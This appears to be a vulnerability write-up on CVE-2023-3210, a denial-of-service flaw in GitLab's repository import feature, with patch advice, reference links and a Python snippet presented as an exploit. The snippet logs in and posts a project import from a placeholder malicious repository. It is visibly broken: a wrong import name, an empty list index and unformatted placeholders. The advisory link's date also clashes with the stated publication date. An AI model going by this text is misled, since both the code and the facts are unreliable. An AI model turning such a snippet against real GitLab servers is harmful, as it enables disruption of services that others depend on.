A critical vulnerability, identified as CVE-2023-3210, has been discovered in the widely-used repository management tool, GitLab. This issue affects a broad range of GitLab versions, as mentioned below, and can potentially be exploited by authenticated users. The vulnerability can cause a Denial of Service (DoS) when importing or cloning malicious content.

Exploit Details

Authenticated users leveraging the import and cloning functionality can exploit this vulnerability by introducing malicious content into the system. This malicious content, when imported or cloned, can lead to a DoS attack, impacting the stability and availability of GitLab instances for all users.

To remediate this issue, it is highly recommended that users update their GitLab instances to the latest patched versions (16.1.5, 16.2.5, or 16.3.1, as appropriate).

Code Snippet

The code snippet below demonstrates how an authenticated user could potentially exploit this vulnerability by using a malicious payload to trigger a DoS condition:

import request
from lxml import html
session_payload = {
    "username": GITLAB_USERNAME,
    "password": GITLAB_PASSWORD
}
login_url = "{GITLAB_URL}/users/sign_in"
session_request = requests.session()
response = session_request.get(login_url)
tree = html.fromstring(response.text)
auth_token = list(set(tree.xpath("//input[@name='authenticity_token']/@value")))[]
session_payload["authenticity_token"] = auth_token
session_request.post(login_url, data = session_payload, headers = dict(referer=login_url))

malicious_payload = {
    "import_url": "{MALICIOUS_REPO_URL}",
    "authenticity_token": auth_token,
    "project[name]": "malicious_repo",
    "project[namespace_id]": "1"
}

new_project_url = "{GITLAB_URL}/projects"
session_request.post(new_project_url, data=malicious_payload, headers=dict(referer=new_project_url))

For more information, please refer to the following sources

1. GitLab Security Advisory: https://about.gitlab.com/releases/2023/09/28/CVE-2023-3210-gitlab-import-repository.html
2. CVE-2023-3210: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3210
3. NVD - CVE-2023-3210: https://nvd.nist.gov/vuln/detail/CVE-2023-3210

Conclusion

Given the widespread use of GitLab in the software development community, it is paramount that administrators update their GitLab instances to the latest patched versions. Failing to do so leaves the system open to potential DoS attacks by authenticated users who import or clone malicious content. It is always best practice to keep software up-to-date to ensure the security and availability of critical systems.

Timeline

Published on: 09/01/2023 11:15:00 UTC
Last modified on: 09/01/2023 21:13:00 UTC